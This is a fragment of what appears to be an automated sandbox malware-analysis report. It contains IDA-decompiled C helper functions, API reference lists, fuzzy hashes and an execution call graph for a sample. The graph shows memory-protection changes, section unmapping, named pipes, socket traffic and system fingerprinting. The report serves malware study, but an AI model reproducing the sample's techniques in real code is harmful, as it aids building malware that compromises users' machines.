                                                                  0x004011dd
                                                                  0x004011ee
                                                                  0x004011f0
                                                                  0x00000000
                                                                  0x004011f6
                                                                  0x004011f6
                                                                  0x004011fd
                                                                  0x0040120e
                                                                  0x00401212
                                                                  0x00401212
                                                                  0x0040121b
                                                                  0x0040121b
                                                                  0x0040121d
                                                                  0x0040121d
                                                                  0x0040121f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00401225
                                                                  0x0040122a
                                                                  0x0040122d
                                                                  0x0040122f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00401231
                                                                  0x00401234
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00401236
                                                                  0x0040123b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00401242
                                                                  0x00401247
                                                                  0x0040124a
                                                                  0x0040124c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00401256
                                                                  0x0040125b
                                                                  0x0040125e
                                                                  0x00401260
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00401262
                                                                  0x0040126d
                                                                  0x00401273
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00401279
                                                                  0x004011ff
                                                                  0x00401203
                                                                  0x00401204
                                                                  0x00401204
                                                                  0x00401205
                                                                  0x00000000
                                                                  0x0040120b
                                                                  0x004011f0
                                                                  0x004011ad
                                                                  0x004011b3
                                                                  0x004011bb
                                                                  0x00000000
                                                                  0x004011bb
                                                                  0x004011b5
                                                                  0x004011b6
                                                                  0x00000000
                                                                  0x004011b6
                                                                  0x00401176
                                                                  0x0040117d
                                                                  0x00401182
                                                                  0x00401187
                                                                  0x0040127b
                                                                  0x0040127e
                                                                  0x0040127f
                                                                  0x00401289
                                                                  0x00401289
                                                                  0x0040128f
                                                                  0x00000000
                                                                  0x00401292
                                                                  0x00401193
                                                                  0x00401198
                                                                  0x0040119d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004011a3
                                                                  0x00401285
                                                                  0x00401286
                                                                  0x00000000
                                                                  0x00401286
                                                                  0x00401126

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00000000,?), ref: 004010D4
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001), ref: 00401101
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00401158
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040129A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: Heaplstrlen$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 4287773761-0
                                                                  • Opcode ID: a66bbd25b2dcf16a01027d6c29f2523e3f6ef847b5161064f6017fef0eaa78a5
                                                                  • Instruction ID: a61aab25a5306d643cc36ac3f086a54a296b9e5a260c2934c5f75bad11e40dcf
                                                                  • Opcode Fuzzy Hash: a66bbd25b2dcf16a01027d6c29f2523e3f6ef847b5161064f6017fef0eaa78a5
                                                                  • Instruction Fuzzy Hash: F2510232900144ABCF219FA09C859BF3BA9EB45319F2801BFF900F62F1D63D8E46D659
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004079ED Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004079ED() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x4301a0; // 0x0
				_t26 =  *0x430190; // 0x0
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x4301a4; // 0x0
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x4303d0, 8, 0x41c4);
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4);
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x4301a0 =  *0x4301a0 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x4303d0, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x50
				_t25 = HeapReAlloc( *0x4303d0, 0,  *0x4301a4, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x430190 =  *0x430190 + 0x10;
				 *0x4301a4 = _t25;
				_t15 =  *0x4301a0; // 0x0
				goto L3;
			}










                                                                  0x004079ed
                                                                  0x004079f2
                                                                  0x004079fe
                                                                  0x00407a30
                                                                  0x00407a30
                                                                  0x00407a46
                                                                  0x00407a49
                                                                  0x00407a51
                                                                  0x00407a54
                                                                  0x00407a80
                                                                  0x00000000
                                                                  0x00407a80
                                                                  0x00407a63
                                                                  0x00407a6b
                                                                  0x00407a6e
                                                                  0x00407a84
                                                                  0x00407a88
                                                                  0x00407a8a
                                                                  0x00407a8d
                                                                  0x00407a96
                                                                  0x00000000
                                                                  0x00407a99
                                                                  0x00407a7a
                                                                  0x00000000
                                                                  0x00407a7a
                                                                  0x00407a00
                                                                  0x00407a15
                                                                  0x00407a1d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00407a1f
                                                                  0x00407a26
                                                                  0x00407a2b
                                                                  0x00000000

                                                                  APIs
                                                                  • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,004077B5,00000000,00000000,00000000,00407106,00000000,00000000,?,00000000,00000000,00000000), ref: 00407A15
                                                                  • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,004077B5,00000000,00000000,00000000,00407106,00000000,00000000,?,00000000,00000000,00000000), ref: 00407A49
                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00407A63
                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00407A7A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: AllocHeap$FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 3499195154-0
                                                                  • Opcode ID: 28bff258e3b9dc222fe6a8b6e61c7224ee6965488e59a3ba2743eb69a8be0b99
                                                                  • Instruction ID: 227d95c63b49c022f8752b5ee38ebcc50db73a680b3c4c8f8f81034c1058e4f3
                                                                  • Opcode Fuzzy Hash: 28bff258e3b9dc222fe6a8b6e61c7224ee6965488e59a3ba2743eb69a8be0b99
                                                                  • Instruction Fuzzy Hash: F4115E306003019FDB218F28EC55E667BB5FB84764B10573AF592E65F0C372A915CF59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405D68 Relevance: 5.0, APIs: 4, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00405D68(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x42d62c);
				InitializeCriticalSection( *0x42d61c);
				InitializeCriticalSection( *0x42d60c);
				InitializeCriticalSection( *0x42d5ec);
				return _t1;
			}




                                                                  0x00405d68
                                                                  0x00405d75
                                                                  0x00405d7d
                                                                  0x00405d85
                                                                  0x00405d8d
                                                                  0x00405d90

                                                                  APIs
                                                                  • InitializeCriticalSection.KERNEL32(?,004049EC,?,00404678), ref: 00405D75
                                                                  • InitializeCriticalSection.KERNEL32(?,004049EC,?,00404678), ref: 00405D7D
                                                                  • InitializeCriticalSection.KERNEL32(?,004049EC,?,00404678), ref: 00405D85
                                                                  • InitializeCriticalSection.KERNEL32(?,004049EC,?,00404678), ref: 00405D8D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalInitializeSection
                                                                  • String ID:
                                                                  • API String ID: 32694325-0
                                                                  • Opcode ID: 481894fb5a7772990a483d8c86d7c8807bc3289c36be9fbd2b928457ba5d2e48
                                                                  • Instruction ID: 34baad05cb421e6ece551980c2bfd6a5576cd7a160fcf6e0b0c6d22aaa26bf2c
                                                                  • Opcode Fuzzy Hash: 481894fb5a7772990a483d8c86d7c8807bc3289c36be9fbd2b928457ba5d2e48
                                                                  • Instruction Fuzzy Hash: 59C00271E10138AACB326F65FC048497F27EB052613528272E10C52130CA715C66EFC8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:5.4%
                                                                  Dynamic/Decrypted Code Coverage:70.6%
                                                                  Signature Coverage:9.6%
                                                                  Total number of Nodes:511
                                                                  Total number of Limit Nodes:29
                                                                  execution_graph 36621 7df471da3cdc 36622 7df471da3ce0 36621->36622 36634 7df471dae130 36622->36634 36624 7df471da3d0a 36625 7df471da3e59 36624->36625 36630 7df471da3d38 36624->36630 36628 7df471da3e75 36625->36628 36640 7df471db2fa4 36625->36640 36627 7df471da3fa1 MapViewOfFile 36631 7df471da3fc9 36627->36631 36628->36627 36629 7df471da3d54 __swprintf_l 36628->36629 36630->36629 36652 7df471db16a8 21 API calls 36630->36652 36631->36629 36653 7df471da36a0 36631->36653 36639 7df471dae144 36634->36639 36635 7df471dae195 VirtualProtect 36637 7df471dcf5d2 36635->36637 36636 7df471dae1d8 36636->36624 36638 7df471dae1c2 VirtualProtect 36637->36638 36638->36636 36639->36635 36639->36636 36641 7df471db2fbb 36640->36641 36642 7df471db30d2 36641->36642 36675 7df471db2e88 36641->36675 36642->36628 36644 7df471db30b8 36644->36642 36645 7df471db30cd NtClose 36644->36645 36645->36642 36646 7df471db2fd6 36646->36642 36646->36644 36647 7df471db302d NtUnmapViewOfSection 36646->36647 36648 7df471db3038 36646->36648 36647->36648 36648->36644 36649 7df471db3041 VirtualAlloc 36648->36649 36650 7df471db3061 36649->36650 36650->36644 36651 7df471db307d NtSetInformationFile 36650->36651 36651->36650 36652->36629 36655 7df471da36da 36653->36655 36654 7df471da3c8c __swprintf_l 36654->36629 36655->36654 36679 7df471d92918 36655->36679 36658 7df471da3919 36660 7df471da20c0 _calloc_dbg 36658->36660 36663 7df471da3956 36658->36663 36659 7df471da3845 36659->36658 36665 7df471da3a40 36659->36665 36712 7df471da20c0 36659->36712 36660->36658 36662 7df471da3c2c ??3@YAXPEAX 36674 7df471da3c11 36662->36674 36685 7df471d92be8 36663->36685 36688 7df471d91a58 36665->36688 36666 7df471da3c57 36708 7df471d91aac 36666->36708 36668 7df471da3a4a 36668->36654 36668->36674 36692 7df471da23e4 36668->36692 36670 7df471da3ba9 36699 7df471daba7c 36670->36699 36674->36662 36674->36666 36676 7df471db2ed8 36675->36676 36677 7df471db2f52 NtOpenFile 36676->36677 36678 7df471db2f76 __swprintf_l 36676->36678 36677->36678 36678->36646 36680 7df471d92bb8 __swprintf_l 36679->36680 36681 7df471d92952 36679->36681 36680->36659 36681->36680 36682 7df471d92aea _malloc_dbg 36681->36682 36682->36680 36683 7df471d92b03 36682->36683 36683->36680 36716 7df471d927e8 36683->36716 36686 7df471d92bf1 ??3@YAXPEAX 36685->36686 36687 7df471d92bf7 36685->36687 36686->36687 36687->36665 36689 7df471d91a68 36688->36689 36690 7df471d91a71 HeapCreate 36689->36690 36691 7df471d91a8a 36689->36691 36690->36691 36691->36668 36728 7df471dcf7e8 36692->36728 36694 7df471da240c RegOpenKeyExW 36695 7df471da2437 RegQueryValueExW 36694->36695 36696 7df471da2472 36694->36696 36695->36696 36697 7df471da24ab GetVolumeInformationW 36696->36697 36698 7df471da24fc __swprintf_l 36696->36698 36697->36698 36698->36670 36700 7df471daba8d 36699->36700 36702 7df471da3bd4 CreateThread FindCloseChangeNotification 36700->36702 36730 7df471dab92c 36700->36730 36703 7df471dd3f9c 36702->36703 36707 7df471dd3fb9 36703->36707 36704 7df471dd3fc8 36704->36674 36707->36704 36737 7df471dd55e8 36707->36737 36743 7df471dd5b2c 36707->36743 36710 7df471d91ab8 36708->36710 36709 7df471d91b14 36709->36654 36710->36709 36711 7df471d91aeb HeapDestroy 36710->36711 36711->36709 36713 7df471dcf69c 36712->36713 36714 7df471da20d7 _calloc_dbg 36713->36714 36715 7df471da20ef 36714->36715 36715->36659 36717 7df471d92802 36716->36717 36718 7df471d9290a 36716->36718 36717->36718 36719 7df471d9280b _malloc_dbg 36717->36719 36718->36680 36719->36718 36720 7df471d92820 36719->36720 36721 7df471d92901 ??3@YAXPEAX 36720->36721 36724 7df471d92638 36720->36724 36721->36718 36723 7df471d928fe 36723->36721 36725 7df471d9278a __swprintf_l 36724->36725 36726 7df471d92662 36724->36726 36725->36723 36726->36725 36727 7df471d92778 _malloc_dbg 36726->36727 36727->36725 36729 7df471dcf7f6 36728->36729 36729->36694 36731 7df471dab97f 36730->36731 36732 7df471dab9ab CreateNamedPipeW 36731->36732 36733 7df471dab9f3 36732->36733 36736 7df471daba35 __swprintf_l 36732->36736 36734 7df471daba0c BindIoCompletionCallback 36733->36734 36735 7df471daba24 ConnectNamedPipe 36734->36735 36734->36736 36735->36736 36736->36700 36740 7df471dd56b7 36737->36740 36741 7df471dd5615 36737->36741 36738 7df471dd570a WSARecv 36738->36740 36742 7df471dd5797 36738->36742 36740->36738 36740->36742 36741->36707 36742->36741 36747 7df471dd4d7c 36742->36747 36744 7df471dd5b43 36743->36744 36745 7df471dd5b83 setsockopt 36744->36745 36746 7df471dd5baa 36744->36746 36745->36746 36746->36707 36748 7df471dd4da1 36747->36748 36749 7df471dd4ddb WSARecv 36748->36749 36750 7df471dd4e25 36749->36750 36750->36741 36751 7df471dab2dc 36752 7df471dab2fe 36751->36752 36755 7df471daf820 36752->36755 36754 7df471dab3fd 36756 7df471daf846 36755->36756 36757 7df471daf8b4 36756->36757 36759 7df471daf85d 36756->36759 36761 7df471daf84e __swprintf_l 36756->36761 36762 7df471dd5ff4 36757->36762 36759->36761 36766 7df471dd6044 ioctlsocket CreateIoCompletionPort SetFileCompletionNotificationModes socket bind 36759->36766 36761->36754 36763 7df471dd601a 36762->36763 36764 7df471dd5ffe 36762->36764 36763->36761 36764->36763 36767 7df471dd4fd8 36764->36767 36766->36761 36768 7df471dd5016 36767->36768 36770 7df471dd4ffe 36767->36770 36768->36770 36771 7df471dd5f48 ioctlsocket CreateIoCompletionPort SetFileCompletionNotificationModes socket bind 36768->36771 36770->36763 36771->36770 36772 7df471da23bc 36775 7df471da7dd4 36772->36775 36774 7df471da23d2 36786 7df471e12230 36775->36786 36781 7df471da7e59 36805 7df471da6e1c 36781->36805 36783 7df471da7ec3 36785 7df471e145aa 36783->36785 36819 7df471e144a8 GetSystemInfo __swprintf_l 36783->36819 36785->36774 36787 7df471e1224c 36786->36787 36789 7df471da7de4 36786->36789 36787->36789 36790 7df471e122f6 __swprintf_l 36787->36790 36825 7df471e01170 GetSystemInfo __swprintf_l 36787->36825 36796 7df471da7b7c 36789->36796 36790->36789 36793 7df471e12444 36790->36793 36826 7df471e0bcc4 GetSystemInfo __swprintf_l 36790->36826 36793->36789 36820 7df471de9468 GetSystemInfo __swprintf_l 36793->36820 36794 7df471e12471 __swprintf_l 36794->36789 36821 7df471e01c6c 36794->36821 36797 7df471da7b9e 36796->36797 36827 7df471db2834 36797->36827 36800 7df471da7cae 36800->36781 36810 7df471da782c 36800->36810 36801 7df471da7c38 36802 7df471db2834 NtQuerySystemInformation 36801->36802 36804 7df471da7c4c 36802->36804 36804->36800 36830 7df471dad454 36804->36830 36806 7df471da6e35 36805->36806 36807 7df471da6e79 36805->36807 36834 7df471da6b20 36806->36834 36807->36783 36811 7df471da785b 36810->36811 36812 7df471da7971 __swprintf_l 36811->36812 36813 7df471da7893 FindFirstFileW 36811->36813 36812->36781 36813->36812 36816 7df471da78ae 36813->36816 36814 7df471da7952 FindNextFileW 36815 7df471da7968 FindClose 36814->36815 36814->36816 36815->36812 36816->36814 36818 7df471da782c _calloc_dbg 36816->36818 36878 7df471da774c _calloc_dbg 36816->36878 36818->36816 36819->36785 36820->36794 36822 7df471dcf690 36821->36822 36823 7df471e01c82 GetSystemInfo 36822->36823 36824 7df471e01ca0 __swprintf_l 36823->36824 36824->36789 36826->36793 36828 7df471db2844 NtQuerySystemInformation 36827->36828 36829 7df471da7c26 _malloc_dbg 36827->36829 36828->36829 36829->36800 36829->36801 36831 7df471dad48a 36830->36831 36833 7df471dad46f 36830->36833 36832 7df471dad4bd _calloc_dbg 36831->36832 36831->36833 36832->36833 36833->36804 36837 7df471da6b44 36834->36837 36835 7df471da6e13 ??3@YAXPEAX 36835->36806 36835->36807 36836 7df471da6e0a ??3@YAXPEAX 36836->36835 36837->36835 36837->36836 36842 7df471da6d9b 36837->36842 36845 7df471db39d4 _malloc_dbg 36837->36845 36839 7df471da6d8c 36851 7df471db3aa0 36839->36851 36840 7df471da6d2f 36840->36839 36840->36842 36846 7df471db38cc 36840->36846 36850 7df471db3dac _malloc_dbg _malloc_dbg 36840->36850 36842->36836 36845->36840 36847 7df471db399d 36846->36847 36848 7df471db38f6 36846->36848 36847->36840 36848->36847 36855 7df471dddb24 36848->36855 36850->36840 36852 7df471db3ab5 36851->36852 36853 7df471db3aa5 36851->36853 36852->36842 36873 7df471ddd3ec 36853->36873 36858 7df471ddd558 36855->36858 36857 7df471dddbd5 36857->36847 36859 7df471ddd5a5 36858->36859 36865 7df471ddd59b __swprintf_l 36858->36865 36861 7df471ddd5cb 36859->36861 36859->36865 36872 7df471ddcc5c _malloc_dbg 36859->36872 36861->36865 36866 7df471db389c _malloc_dbg 36861->36866 36863 7df471ddd721 36863->36865 36868 7df471e536cc 36863->36868 36865->36857 36867 7df471db38b4 36866->36867 36867->36863 36869 7df471e53701 36868->36869 36871 7df471e536f8 36868->36871 36870 7df471e5382e _malloc_dbg 36869->36870 36869->36871 36870->36871 36871->36865 36872->36861 36874 7df471ddd413 36873->36874 36876 7df471ddd40b 36873->36876 36874->36876 36877 7df471ddcc5c _malloc_dbg 36874->36877 36876->36852 36877->36876 36878->36814 36879 7df471daf6dc 36880 7df471daf714 36879->36880 36883 7df471dd43c0 36880->36883 36882 7df471daf778 __swprintf_l 36884 7df471dd43d2 36883->36884 36885 7df471dd43e3 36883->36885 36884->36882 36885->36884 36887 7df471dd5384 36885->36887 36888 7df471dd53cc 36887->36888 36889 7df471dd540b WSASend 36888->36889 36890 7df471dd5449 36889->36890 36890->36884 36891 7ffa06ee1178 lstrlenA 36892 7ffa06ee11b5 36891->36892 36893 7ffa06ee12de 36892->36893 36894 7ffa06ee11bd LocalAlloc 36892->36894 36894->36893 36895 7ffa06ee11dd 36894->36895 36896 7ffa06ee1240 LocalFree 36895->36896 36897 7ffa06ee11fd 36895->36897 36896->36893 36899 7ffa06ee1252 CreateFileMappingW 36896->36899 36908 7ffa06ee1020 LocalAlloc LocalFree _ioinit0 36897->36908 36901 7ffa06ee1279 MapViewOfFile 36899->36901 36902 7ffa06ee12d5 LocalFree 36899->36902 36900 7ffa06ee1213 36900->36896 36903 7ffa06ee1217 LocalAlloc 36900->36903 36904 7ffa06ee12cc CloseHandle 36901->36904 36906 7ffa06ee129a _setmbcp 36901->36906 36902->36893 36903->36896 36905 7ffa06ee122e _setmbcp 36903->36905 36904->36902 36905->36896 36907 7ffa06ee12c3 UnmapViewOfFile 36906->36907 36907->36904 36908->36900 36909 7df471dab760 36910 7df471dab7ee 36909->36910 36911 7df471dab769 36909->36911 36911->36910 36912 7df471dab7f0 ??3@YAXPEAX 36911->36912 36913 7df471dab7c9 36911->36913 36912->36910 36913->36910 36914 7df471dab92c 3 API calls 36913->36914 36914->36913 36915 7df471dad200 36916 7df471dad220 36915->36916 36917 7df471dad267 36915->36917 36916->36917 36918 7df471dad28b _malloc_dbg 36916->36918 36918->36917 36919 7ffa06ee1c74 36920 7ffa06ee1c90 36919->36920 36922 7ffa06ee1c95 36919->36922 36970 7ffa06ee3198 GetTickCount64 GetTickCount64 __security_init_cookie _getptd_noexit 36920->36970 36927 7ffa06ee1d20 36922->36927 36928 7ffa06ee1cea 36922->36928 36933 7ffa06ee1b1c 36922->36933 36925 7ffa06ee1d3e 36926 7ffa06ee1d67 36925->36926 36972 7ffa06ee1000 DisableThreadLibraryCalls 36925->36972 36926->36928 36929 7ffa06ee1b1c _CRT_INIT 51 API calls 36926->36929 36927->36928 36971 7ffa06ee1000 DisableThreadLibraryCalls 36927->36971 36929->36928 36931 7ffa06ee1d5a 36932 7ffa06ee1b1c _CRT_INIT 51 API calls 36931->36932 36932->36926 36934 7ffa06ee1ba5 36933->36934 36939 7ffa06ee1b2e _heap_init 36933->36939 36935 7ffa06ee1bf7 36934->36935 36941 7ffa06ee1ba9 _CRT_INIT 36934->36941 36936 7ffa06ee1c5a 36935->36936 36937 7ffa06ee1bfc FlsGetValue 36935->36937 36956 7ffa06ee1b37 _CRT_INIT _getptd_noexit 36936->36956 37038 7ffa06ee21f0 37 API calls _freefls 36936->37038 36938 7ffa06ee1c0c 36937->36938 36937->36956 37032 7ffa06ee34e8 36938->37032 36939->36956 36973 7ffa06ee2390 36939->36973 36941->36956 37028 7ffa06ee2490 36 API calls 2 library calls 36941->37028 36945 7ffa06ee1bcd 36958 7ffa06ee1bdc _CRT_INIT 36945->36958 37029 7ffa06ee2cf4 35 API calls 2 library calls 36945->37029 36947 7ffa06ee1c25 FlsSetValue 36949 7ffa06ee1c50 36947->36949 36950 7ffa06ee1c3a 36947->36950 37037 7ffa06ee3158 35 API calls 3 library calls 36949->37037 37036 7ffa06ee22d4 35 API calls 2 library calls 36950->37036 36951 7ffa06ee1bd7 37030 7ffa06ee2410 35 API calls 2 library calls 36951->37030 36952 7ffa06ee1b43 _CRT_INIT _RTC_Initialize 36952->36956 36983 7ffa06ee3250 GetEnvironmentStringsW 36952->36983 36956->36927 36958->36956 37031 7ffa06ee2410 35 API calls 2 library calls 36958->37031 36960 7ffa06ee1b65 _ioinit0 36993 7ffa06ee2d68 36960->36993 36963 7ffa06ee1b8a 36963->36956 37026 7ffa06ee2cf4 35 API calls 2 library calls 36963->37026 36967 7ffa06ee1b9e 37027 7ffa06ee2410 35 API calls 2 library calls 36967->37027 36970->36922 36971->36925 36972->36931 36976 7ffa06ee239b _mtinitlocks _init_pointers 36973->36976 36974 7ffa06ee2402 37040 7ffa06ee2410 35 API calls 2 library calls 36974->37040 36976->36974 36977 7ffa06ee34e8 _calloc_crt 35 API calls 36976->36977 36978 7ffa06ee23ca 36977->36978 36978->36974 36979 7ffa06ee23d2 FlsSetValue 36978->36979 36979->36974 36980 7ffa06ee23e4 36979->36980 37039 7ffa06ee22d4 35 API calls 2 library calls 36980->37039 36982 7ffa06ee23ee _getptd_noexit 36982->36952 36984 7ffa06ee3327 36983->36984 36985 7ffa06ee327e __crtLCMapStringA_stat 36983->36985 36984->36960 36985->36985 36986 7ffa06ee331e FreeEnvironmentStringsW 36985->36986 37041 7ffa06ee3568 36985->37041 36986->36984 36989 7ffa06ee32dd __crtLCMapStringA_stat 36990 7ffa06ee3310 FreeEnvironmentStringsW 36989->36990 37045 7ffa06ee3158 35 API calls 3 library calls 36989->37045 36990->36984 36992 7ffa06ee330d 36992->36990 36994 7ffa06ee2d85 GetModuleFileNameA 36993->36994 36995 7ffa06ee2d80 36993->36995 36997 7ffa06ee2db7 36994->36997 37077 7ffa06ee3e5c 36 API calls _setmbcp 36995->37077 37071 7ffa06ee2e5c 36997->37071 37000 7ffa06ee3568 _malloc_crt 35 API calls 37001 7ffa06ee2e0b 37000->37001 37002 7ffa06ee2e5c parse_cmdline 35 API calls 37001->37002 37003 7ffa06ee1b76 37001->37003 37002->37003 37003->36963 37004 7ffa06ee3024 37003->37004 37005 7ffa06ee3041 37004->37005 37007 7ffa06ee3046 _setenvp 37004->37007 37080 7ffa06ee3e5c 36 API calls _setmbcp 37005->37080 37008 7ffa06ee34e8 _calloc_crt 35 API calls 37007->37008 37016 7ffa06ee1b7f 37007->37016 37009 7ffa06ee3086 _setenvp 37008->37009 37011 7ffa06ee30ea 37009->37011 37012 7ffa06ee34e8 _calloc_crt 35 API calls 37009->37012 37013 7ffa06ee3126 37009->37013 37009->37016 37017 7ffa06ee313f 37009->37017 37081 7ffa06ee55a8 35 API calls 2 library calls 37009->37081 37082 7ffa06ee3158 35 API calls 3 library calls 37011->37082 37012->37009 37083 7ffa06ee3158 35 API calls 3 library calls 37013->37083 37016->36963 37020 7ffa06ee25fc 37016->37020 37084 7ffa06ee496c 5 API calls _call_reportfault 37017->37084 37021 7ffa06ee2612 _IsNonwritableInCurrentImage _initp_misc_cfltcvt_tab 37020->37021 37085 7ffa06ee2734 37021->37085 37025 7ffa06ee2652 _IsNonwritableInCurrentImage 37025->36963 37026->36967 37027->36956 37028->36945 37029->36951 37030->36958 37031->36956 37034 7ffa06ee350d _malloc_crt 37032->37034 37035 7ffa06ee1c19 37034->37035 37096 7ffa06ee5854 37034->37096 37035->36947 37035->36956 37036->36956 37037->36956 37038->36956 37039->36982 37040->36982 37044 7ffa06ee3590 _malloc_crt 37041->37044 37043 7ffa06ee32d5 37043->36986 37043->36989 37044->37043 37046 7ffa06ee56c8 37044->37046 37045->36992 37047 7ffa06ee575c 37046->37047 37054 7ffa06ee56e0 37046->37054 37069 7ffa06ee5024 DecodePointer 37047->37069 37049 7ffa06ee5761 37070 7ffa06ee4cfc 35 API calls _getptd_noexit 37049->37070 37050 7ffa06ee5718 HeapAlloc 37052 7ffa06ee5751 37050->37052 37050->37054 37052->37044 37054->37050 37055 7ffa06ee5741 37054->37055 37059 7ffa06ee56f8 37054->37059 37060 7ffa06ee5746 37054->37060 37066 7ffa06ee5024 DecodePointer 37054->37066 37067 7ffa06ee4cfc 35 API calls _getptd_noexit 37055->37067 37059->37050 37063 7ffa06ee49a8 35 API calls 2 library calls 37059->37063 37064 7ffa06ee4a1c 35 API calls 7 library calls 37059->37064 37065 7ffa06ee2478 GetModuleHandleExW GetProcAddress _mtinitlocknum 37059->37065 37068 7ffa06ee4cfc 35 API calls _getptd_noexit 37060->37068 37063->37059 37064->37059 37066->37054 37067->37060 37068->37052 37069->37049 37070->37052 37073 7ffa06ee2e9a 37071->37073 37075 7ffa06ee2f00 37073->37075 37078 7ffa06ee5518 35 API calls _LocaleUpdate::_LocaleUpdate 37073->37078 37074 7ffa06ee2ddb 37074->37000 37074->37003 37075->37074 37079 7ffa06ee5518 35 API calls _LocaleUpdate::_LocaleUpdate 37075->37079 37077->36994 37078->37073 37079->37075 37080->37007 37081->37009 37082->37016 37083->37016 37086 7ffa06ee2642 37085->37086 37087 7ffa06ee274b 37085->37087 37086->37025 37089 7ffa06ee4f90 40 API calls _onexit 37086->37089 37087->37086 37090 7ffa06ee5344 37087->37090 37089->37025 37091 7ffa06ee535f 37090->37091 37092 7ffa06ee34e8 _calloc_crt 35 API calls 37091->37092 37093 7ffa06ee537e 37092->37093 37094 7ffa06ee539b 37093->37094 37095 7ffa06ee34e8 _calloc_crt 35 API calls 37093->37095 37094->37087 37095->37094 37097 7ffa06ee5869 37096->37097 37102 7ffa06ee5886 37096->37102 37098 7ffa06ee5877 37097->37098 37097->37102 37104 7ffa06ee4cfc 35 API calls _getptd_noexit 37098->37104 37100 7ffa06ee589e HeapAlloc 37101 7ffa06ee587c 37100->37101 37100->37102 37101->37034 37102->37100 37102->37101 37105 7ffa06ee5024 DecodePointer 37102->37105 37104->37101 37105->37102 37106 7df471da0ef4 37108 7df471da0f1c 37106->37108 37107 7df471da0f7f 37108->37107 